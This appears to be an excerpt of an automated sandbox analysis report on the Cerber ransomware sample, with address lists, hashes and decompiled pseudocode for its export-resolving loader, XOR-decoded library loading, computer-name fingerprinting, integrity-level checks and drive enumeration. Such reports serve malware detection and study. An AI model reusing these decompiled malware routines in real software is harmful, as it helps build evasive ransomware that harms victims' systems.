0x004036b9
0x004036c0
0x004036c5
0x004036cc
0x004036d1
0x004036d3
0x004036d3
0x004036c7
0x004036c9
0x004036c9
0x004036bb
0x004036bd
0x004036bd
0x004036d6
0x004036d8
0x004036db
0x004036f4
0x004036f4
0x004036fc
0x004036fe
0x00403700
0x00000000
0x004036dd
0x004036dd
0x004036e1
0x004036e8
0x004036eb
0x004036ec
0x004036ef
0x004036ef
0x00000000
0x004036dd
0x004036db
0x0040364e
0x00403652
0x00000000
0x00000000
0x00403658
0x0040365c
0x00000000
0x00000000
0x00403665
0x00403672
0x0040367b
0x0040367f
0x00403685
0x00403688
0x0040368a
0x00000000
0x00000000
0x00403690
0x00403699
0x0040369c
0x0040369e
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036af
0x004036b1
0x00000000
0x004036b1
0x00403634
0x00403639
0x00000000
0x00000000
0x0040363b
0x00000000
0x0040363b
0x0040361a
0x0040361f
0x00000000
0x00000000
0x00000000
0x0040361f
0x004035d8
0x00000000
0x004035d8
0x0040359c
0x0040359c
0x00000000
0x0040371d
0x0040371d
0x0040371e
0x00403724
0x00403724
0x0040372d
0x00000000
0x0040372d
0x0040357c
0x00000000
0x00000000
0x00000000
0x00000000
0x00403523
0x00403523
0x00403523
0x00403526
0x00000000
0x00000000
0x00403528
0x0040352a
0x0040352c
0x00000000
0x00000000
0x0040352e
0x0040352f
0x00403532
0x00403534
0x00403536
0x00403537
0x0040353a
0x0040353d
0x0040353f
0x00403542
0x0040354b
0x0040354e
0x00403551
0x00403554
0x0040355c
0x00403556
0x00403556
0x00403556
0x0040355d
0x0040355f
0x0040355f
0x0040355f
0x00403544
0x00403544
0x00403545
0x00403548
0x00403548
0x00403563
0x00403563
0x00403565
0x00403568
0x00000000
0x00000000
0x00000000
0x00000000
0x00403568
0x00000000
0x00403523
0x0040350d
0x00000000
0x0040350d

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e465166b07509489fe7f3d8f6ed24c9aee09f8265a77ea133756a180c1d7128
Instruction ID: 3d60bcc9a551e5941e8321dfcb901b198a737b75647c57ae2da6220dae092667
Opcode Fuzzy Hash: 5e465166b07509489fe7f3d8f6ed24c9aee09f8265a77ea133756a180c1d7128
Instruction Fuzzy Hash: 937102B1D04246ABEB259FA8884577EBFA8EB41312F24447BC442B73C2D67C8F418B59

Uniqueness

Uniqueness Score: -1.00%

Function 01570480 Relevance: 2.7, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 015704C5
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 015705A1

Memory Dump Source

Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
Instruction ID: a96aa12e1e2d59528ba4bb31f3a8335dc4d4be0aa76ba9b2c65531827691bb67
Opcode Fuzzy Hash: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
Instruction Fuzzy Hash: 5F91AC75A00109DFDB48CF98D591EAEB7F5BF88314F208159E919AB381D735EE82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004050BF Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050BF(intOrPtr* _a4, signed short _a8, signed int _a12, signed int _a16) {
				char _v132;
				intOrPtr* _v136;
				signed short _v140;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr _t45;
				struct HINSTANCE__* _t53;
				void* _t57;
				signed int _t60;
				void* _t64;
				signed int _t66;
				signed short _t69;
				intOrPtr* _t81;
				signed int _t85;
				void* _t86;
				signed int _t87;

				_t81 = _a4;
				if(_t81 != 0) {
					_t64 = 0;
					__eflags =  *_t81 - 0x5a4d;
					if( *_t81 != 0x5a4d) {
						L20:
						_t38 = _t64;
						L21:
						return _t38;
					}
					_t40 =  *((intOrPtr*)(_t81 + 0x3c)) + _t81 + 4;
					_v136 = _t40;
					__eflags =  *_t40 - 0x14c;
					if( *_t40 != 0x14c) {
						goto L20;
					}
					_t85 =  *(_t40 + 0x74);
					__eflags = _t85;
					if(_t85 == 0) {
						goto L20;
					}
					_t69 = _a8;
					_t86 = _t85 + _t81;
					__eflags = _t69 >> 0x10;
					if(_t69 >> 0x10 != 0) {
						__eflags = _a12 & 0x00000001;
						if((_a12 & 0x00000001) == 0) {
							_v140 = E00404EF9(_t69, E0040507C(_t69));
						} else {
							_v140 = _t69;
						}
						_t66 = 0;
						__eflags =  *(_t86 + 0x18);
						if( *(_t86 + 0x18) <= 0) {
							goto L13;
						} else {
							while(1) {
								_t57 = E00404EF9( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81, E0040507C( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81));
								__eflags = _v140 - _t57;
								if(_v140 == _t57) {
									break;
								}
								_t66 = _t66 + 1;
								__eflags = _t66 -  *(_t86 + 0x18);
								if(_t66 <  *(_t86 + 0x18)) {
									continue;
								}
								goto L13;
							}
							_t60 =  *( *((intOrPtr*)(_t86 + 0x24)) + _t66 * 2 + _t81) & 0x0000ffff;
							goto L23;
						}
					} else {
						_t60 = (_t69 & 0x0000ffff) -  *((intOrPtr*)(_t86 + 0x10));
						L23:
						__eflags = _t60 - 0xffffffff;
						if(_t60 == 0xffffffff) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							__eflags = _t64 - _t86;
							if(_t64 < _t86) {
								goto L20;
							}
							_t45 = _v136;
							__eflags = _t64 -  *((intOrPtr*)(_t45 + 0x78)) + _t86;
							if(_t64 >=  *((intOrPtr*)(_t45 + 0x78)) + _t86) {
								goto L20;
							}
							__eflags = _a16;
							if(__eflags == 0) {
								goto L1;
							}
							E0040508C(_t64, __eflags,  &_v132);
							_t64 = 0;
							_t87 = E004050A5( &_v132);
							__eflags = _t87;
							if(_t87 != 0) {
								 *_t87 = 0; // executed
								_t53 = LoadLibraryExA( &_v132, 0, 0);
								__eflags = _t53;
								if(_t53 != 0) {
									__eflags = _t87 + 1;
									_t64 = E004050BF(_t53, _t87 + 1, 0, _a16);
								}
							}
							goto L20;
						}
						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c)) + _t60 * 4 + _t81)) + _t81;
						goto L14;
					}
				}
				L1:
				_t38 = 0;
				goto L21;
			}

0x004050ce
0x004050d3
0x004050e1
0x004050e3
0x004050e6
0x004051d0
0x004051d0
0x004051d2
0x004051d8
0x004051d8
0x004050ef
0x004050f8
0x004050fc
0x004050ff
0x00000000
0x00000000
0x00405105
0x00405108
0x0040510a
0x00000000
0x00000000
0x00405110
0x00405118
0x0040511a
0x0040511d
0x0040512a
0x0040512e
0x00405144
0x00405130
0x00405130
0x00405130
0x00405148
0x0040514a
0x0040514d
0x00000000
0x0040514f
0x0040514f
0x00405161
0x00405168
0x0040516c
0x00000000
0x00000000
0x0040516e
0x0040516f
0x00405172
0x00000000
0x00000000
0x00000000
0x00405172
0x004051df
0x00000000
0x004051df
0x0040511f
0x00405122
0x004051e3
0x004051e3
0x004051e6
0x00405174
0x00405174
0x00405174
0x00405176
0x00405176
0x00405178
0x00000000
0x00000000
0x0040517a
0x00405183
0x00405185
0x00000000
0x00000000
0x00405187
0x0040518b
0x00000000
0x00000000
0x00405198
0x004051a2
0x004051a9
0x004051ab
0x004051ad
0x004051b6
0x004051b8
0x004051bb
0x004051bd
0x004051c2
0x004051ce
0x004051ce
0x004051bd
0x00000000
0x004051ad
0x004051f1
0x00000000
0x004051f1
0x0040511d
0x004050d5
0x004050d5
0x00000000

APIs

LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004051B8

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
Instruction ID: c6742ce8dd1339212489777c70171deb5d259b5c48844efc6f8ab68823c637eb
Opcode Fuzzy Hash: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
Instruction Fuzzy Hash: 5831D471A00A058FC724DE28C8C0A6B73E4FB44314F10063EE855AB2D2EB78DD44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 01570200 Relevance: 1.6, APIs: 1, Instructions: 77libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 01570258

Memory Dump Source

Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
Instruction ID: 00f83e7a15857813c4ba0a6db3bd33822a73f6d1fc37a61c6372f6d1559e12bd
Opcode Fuzzy Hash: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
Instruction Fuzzy Hash: EB31B975A00209DFCB08CF98C881AADB7F1FF8C314F108699E919AB395D734AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00402E39 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00402E39(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed short _v22;
				signed short _v24;
				char _v28;
				char _v44;
				void* __ebp;
				int _t23;
				void* _t27;
				void* _t42;

				_t42 = __ecx;
				_t41 = __ebx;
				_v8 = 0x10;
				_t23 = GetComputerNameA( &_v44,  &_v8);
				_t54 = _t23;
				if(_t23 != 0) {
					_push(_a4);
					_push( &_v44);
					_push(E00405905(0x40ced4, 5, 0x7f642c43));
					_push( &_v12);
					_t23 = E00405B59(__ebx, _t42, __edi, __esi, _t54);
					if(_t23 != 0) {
						_push(__esi);
						_t46 = _v12;
						_t27 = E0040AD86( &_v28, _v12, _t23,  &_v28); // executed
						_t56 = _t27;
						if(_t27 != 0) {
							_push(_v13 & 0x000000ff);
							_push(_v14 & 0x000000ff);
							_push(_v15 & 0x000000ff);
							_push(_v16 & 0x000000ff);
							_push(_v17 & 0x000000ff);
							_push(_v18 & 0x000000ff);
							_push(_v19 & 0x000000ff);
							_push(_v20 & 0x000000ff);
							_push(_v22 & 0x0000ffff);
							_push(_v24 & 0x0000ffff);
							_push(_v28);
							_push(E0040591C(0x40d228, 0x3c, 0x1f9ba433));
							_push(_a8);
							E00405A8E(_t41, __edi, _t46, _t56);
						}
						return E00405463(_t46);
					}
				}
				return _t23;
			}

0x00402e39
0x00402e39
0x00402e47
0x00402e4e
0x00402e54
0x00402e56
0x00402e5c
0x00402e62
0x00402e77
0x00402e7b
0x00402e7c
0x00402e86
0x00402e88
0x00402e89
0x00402e92
0x00402e9a
0x00402e9c
0x00402ea2
0x00402ea7
0x00402eac
0x00402eb1
0x00402eb6
0x00402ebb
0x00402ec0
0x00402ec5
0x00402eca
0x00402ecf
0x00402ed0
0x00402ee7
0x00402ee8
0x00402eeb
0x00402ef0
0x00000000
0x00402ef8
0x00402e86
0x00402efa

APIs

GetComputerNameA.KERNEL32(?,00000000), ref: 00402E4E

Part of subcall function 0040AD86: CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
Part of subcall function 0040AD86: CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
Part of subcall function 0040AD86: CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
Part of subcall function 0040AD86: CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CryptHash$ComputerCreateDataDestroyNameParam
String ID:
API String ID: 1269158035-0
Opcode ID: b519f69bbded85a786daec2fbcfd748c4088cd11490853b39124be7fa2958df4
Instruction ID: b50cf408ba8baf7f798fd3c54e054df88dd5bb54a10a58e4a69460bee7ee399a
Opcode Fuzzy Hash: b519f69bbded85a786daec2fbcfd748c4088cd11490853b39124be7fa2958df4
Instruction Fuzzy Hash: BE110DA6C00159BDDF51A7D58D05EFFBBBC9E09205F0800A6FA90F11C2E67C9744ABB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC91 Relevance: 1.5, APIs: 1, Instructions: 48
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC91(intOrPtr* __edi) {
				void* _v5;
				struct HINSTANCE__* _v12;
				char _v276;
				void* _t17;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				void* _t24;
				signed char _t27;
				signed char _t28;
				signed char* _t29;
				intOrPtr* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_t29 = __edi;
				_t28 =  *((intOrPtr*)(__edi));
				_t35 = _t34 - 0x110;
				_t24 = 0;
				_t17 = 0;
				while(1) {
					_t27 =  *(_t29 + _t17 + 1) ^ _t28;
					 *(_t33 + _t17 - 0x110) = _t27;
					if(_t27 == 0) {
						break;
					}
					_t17 = _t17 + 1;
					if(_t17 < 0x104) {
						continue;
					}
					break;
				}
				_v5 = _t24;
				_t19 = LoadLibraryExA( &_v276, _t24, _t24); // executed
				_v12 = _t19;
				if(_t19 != _t24) {
					_v5 = 1;
					if( *((intOrPtr*)(_t29 + 0x108)) > _t24) {
						while(1) {
							_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x10c)) + _t24 * 4));
							_t22 = E004050BF(_v12,  *_t32, 1,  *0x40edd0); // executed
							_t35 = _t35 + 0x10;
							 *_t32 = _t22;
							if(_t22 == 0) {
								break;
							}
							_t24 = _t24 + 1;
							if(_t24 <  *((intOrPtr*)(_t29 + 0x108))) {
								continue;
							} else {
							}
							goto L9;
						}
						_v5 = 0;
					}
				}
				L9:
				return _v5;
			}

0x0040ac91
0x0040ac94
0x0040ac96
0x0040ac9d
0x0040aca0
0x0040aca2
0x0040aca6
0x0040aca8
0x0040acaf
0x00000000
0x00000000
0x0040acb1
0x0040acb7
0x00000000
0x00000000
0x00000000
0x0040acb7
0x0040acc2
0x0040acc5
0x0040accb
0x0040acd0
0x0040acd2
0x0040acdc
0x0040acde
0x0040acea
0x0040acf4
0x0040acf9
0x0040acfc
0x0040ad00
0x00000000
0x00000000
0x0040ad02
0x0040ad09
0x00000000
0x00000000
0x0040ad0b
0x00000000
0x0040ad09
0x0040ad0d
0x0040ad0d
0x0040acdc
0x0040ad11
0x0040ad17

APIs

LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 0040ACC5

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
Instruction ID: 23337402054ed03b5f3c0123adcbe3b28fa92f0f123e7d1e65809f76e8499c93
Opcode Fuzzy Hash: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
Instruction Fuzzy Hash: 7A01DB309083496FDB119FB88CC47DABBA5FF05304F2408BAD591A3241D27655A48B95

Uniqueness

Uniqueness Score: -1.00%

Function 004061F0 Relevance: 1.5, APIs: 1, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004061F0(void _a4, intOrPtr _a8) {
				void* __esi;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t14;

				_push(8);
				_t14 = E004053BD(_t11);
				 *((intOrPtr*)(_t14 + 4)) = _a8;
				 *_t14 = _a4; // executed
				_t7 = CreateThread(0, 0, E004061AD, _t14, 0, 0); // executed
				_t10 = _t7;
				if(_t10 == 0) {
					E00405463(_t14);
				}
				return _t10;
			}

0x004061f3
0x004061fe
0x0040620b
0x00406214
0x00406216
0x0040621c
0x00406220
0x00406222
0x00406222
0x0040622c

APIs

CreateThread.KERNEL32(00000000,00000000,004061AD,00000000,00000000,00000000), ref: 00406216

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFreeHeapThread
String ID:
API String ID: 4263259073-0
Opcode ID: 54d59fb468806151dceec979e96b6f47042b5d20e8f1a18db49c7d5065055fb0
Instruction ID: 2812b96b26305364032fe100abab6843c2b7e65513a4710c39ebf8c841c04337
Opcode Fuzzy Hash: 54d59fb468806151dceec979e96b6f47042b5d20e8f1a18db49c7d5065055fb0
Instruction Fuzzy Hash: 4FE092312016402BD2209A6A9C88E4BAEECEFCAB60700083EF184D3240D17448408760

Uniqueness

Uniqueness Score: -1.00%

Function 00402DB2 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DB2(void* __ecx, void* _a4) {
				void _v8;
				long _v12;
				int _t9;
				signed int _t12;

				_t12 = 0; // executed
				_t9 = GetTokenInformation(_a4, 0x14,  &_v8, 4,  &_v12); // executed
				if(_t9 != 0) {
					_t12 = 0 | _v8 != 0x00000000;
				}
				return _t12;
			}

0x00402dc7
0x00402dc9
0x00402dd1
0x00402dd6
0x00402dd6
0x00402ddd

APIs

GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,00000000,?,?,?,00402E1D,?,?,?,?,0040811E,00000000), ref: 00402DC9

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 1415b629b72e08108e8843fc689f34dbd589cb1b8d3e6f04ce8534f808bc57c8
Instruction ID: f68ba9d15734d54e553b550f5bd3ee113b61f2fe16c3689ea55df47943aa01e9
Opcode Fuzzy Hash: 1415b629b72e08108e8843fc689f34dbd589cb1b8d3e6f04ce8534f808bc57c8
Instruction Fuzzy Hash: 0AE012B6640208BFEB108FD1CD86EEA776CDB04750F40457AB601E6190E2B1EE48DA64

Uniqueness

Uniqueness Score: -1.00%

Function 00405FC4 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405FC4() {
				void _v36;
				signed int _v40;
				signed int _t15;

				_v40 = _v40 & 0x00000000;
				_t15 = 8;
				memset( &_v36, 0, _t15 << 2);
				 *0x40f290( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x00405fca
0x00405fd1
0x00405fd7
0x00405fdd
0x00405fef

APIs

GetNativeSystemInfo.KERNEL32(00000000,?), ref: 00405FDD

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ed0ff8cc2362c2341b7189f3826e52ef806225ea06f4d6b74520a9749d4f6c68
Instruction ID: a80d948a40472990c3a1bd15c60ed541d0a2738428581dc1f3aa6b92ed2cd684
Opcode Fuzzy Hash: ed0ff8cc2362c2341b7189f3826e52ef806225ea06f4d6b74520a9749d4f6c68
Instruction Fuzzy Hash: 9BD0123291420C5BCF14D7B4D9097CE77F86B4C714F204975D101BB080E6B5A9488664

Uniqueness

Uniqueness Score: -1.00%

Function 004066BB Relevance: 1.5, APIs: 1, Instructions: 16
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066BB(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a16) {

				if(_a8 == 0x110) {
					 *( *(_a16 + 0x40)) = E0040AD18() & 0x000000ff; // executed
					PostMessageW(_a4, 0x111, 2, 0); // executed
				}
				return 0;
			}

0x004066c4
0x004066e2
0x004066e4
0x004066e4
0x004066ed

APIs

PostMessageW.USER32(?,00000111,00000002,00000000), ref: 004066E4

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
Instruction ID: 58071ac7e67bca16a1a60f0a94fc769f562db5208c4ac91bb24582f556c60f10
Opcode Fuzzy Hash: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
Instruction Fuzzy Hash: 8AD01270244304AFD704DF61D84AB6A77D1AF84709F10481DF6826A1C1D6B58414EB26

Uniqueness

Uniqueness Score: -1.00%

Function 00404EA5 Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404EA5(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x00404ea9
0x00404eb9

APIs

GetFileAttributesW.KERNEL32(00000000,00402C7B,00000000,0040D1E8,00000018,88B820F2,00402B2A,00000000,00406B45,?,00000000,?,00000000,-00000006), ref: 00404EA9

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 58b04887cf9564524778792e60d30107c1beba6fcb132c212822ae6046ecd1e9
Instruction ID: bbb8cf1cb537a297bfb223683202dd81dc390b3e2bc649c9f671bb5a52675b16
Opcode Fuzzy Hash: 58b04887cf9564524778792e60d30107c1beba6fcb132c212822ae6046ecd1e9
Instruction Fuzzy Hash: F0B0127D2910004BCB180734AD4508E75506F84631720477CB033D04F0D731CC61BA04

Uniqueness

Uniqueness Score: -1.00%

Function 0040562B Relevance: 1.3, APIs: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040562B(int __eax, WCHAR* _a4) {
				void* __esi;
				int _t8;
				void* _t12;
				int _t14;
				void* _t17;
				int _t20;
				void* _t22;

				_t15 = __eax;
				_t20 = 0;
				if(__eax != 0) {
					L2:
					_t8 = E00405594(_t15, 0, _a4, _t20); // executed
					_t24 = _t8;
					_t17 = _t22;
					if(_t8 != 0) {
						_t20 = E004053BD(_t17);
						if(_t20 != 0) {
							_t12 = E0040560B(_t24, _a4, _t15);
							if(_t12 == 0) {
								E00405463(_t20);
								_t20 = 0;
							} else {
								 *((char*)(_t12 + _t20)) = 0;
							}
						}
					}
					L8:
					return _t20;
				}
				_t14 = lstrlenW(_a4);
				_t15 = _t14;
				if(_t14 == 0) {
					goto L8;
				}
				goto L2;
			}

0x0040562d
0x0040562f
0x00405633
0x00405645
0x0040564f
0x00405654
0x00405657
0x0040565a
0x00405664
0x00405668
0x00405673
0x0040567c
0x00405686
0x0040568b
0x0040567e
0x0040567e
0x0040567e
0x0040567c
0x00405668
0x0040568e
0x00405692
0x00405692
0x00405639
0x0040563f
0x00405643
0x00000000
0x00000000
0x00000000

APIs

lstrlenW.KERNEL32(?,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?,?,?,?,?,00000000), ref: 00405639

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeHeaplstrlen
String ID:
API String ID: 1699902910-0
Opcode ID: 9be68d88605cc9a3ab19978fb24a9ff80f150417492ed5a5cbe71227c020fb94
Instruction ID: 8f47999d6441de1606a46da9c65c5938dd2289a697ef7c270dda7bccf784f778
Opcode Fuzzy Hash: 9be68d88605cc9a3ab19978fb24a9ff80f150417492ed5a5cbe71227c020fb94
Instruction Fuzzy Hash: B3F0C832208A115FD722592A5C4052B67D6CBC47747660A3BF818B73D1EA7B8C014EA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A892 Relevance: 1.3, APIs: 1, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040A892(signed int _a4, WCHAR* _a8) {
				short _v8;
				short _v10;
				short _v12;
				short _t16;
				short _t19;
				signed char _t22;
				short _t25;

				_push(_t22);
				_push(_t22);
				_t25 = 0;
				if((_a4 & 1 << _t22) != 0) {
					_v12 = _t22 + 0x41;
					_t16 = 0x3a;
					_v10 = _t16;
					_v8 = 0;
					_t19 = E0040A150( &_v12); // executed
					_t25 = _t19;
					if(_t25 != 0) {
						lstrcpyW(_a8,  &_v12);
					}
				}
				return _t25;
			}

0x0040a895
0x0040a896
0x0040a89d
0x0040a8a2
0x0040a8ac
0x0040a8b2
0x0040a8b3
0x0040a8b9
0x0040a8c1
0x0040a8c6
0x0040a8cb
0x0040a8d4
0x0040a8d4
0x0040a8cb
0x0040a8de

APIs

Part of subcall function 0040A150: GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0040A15D
Part of subcall function 0040A150: QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 0040A183
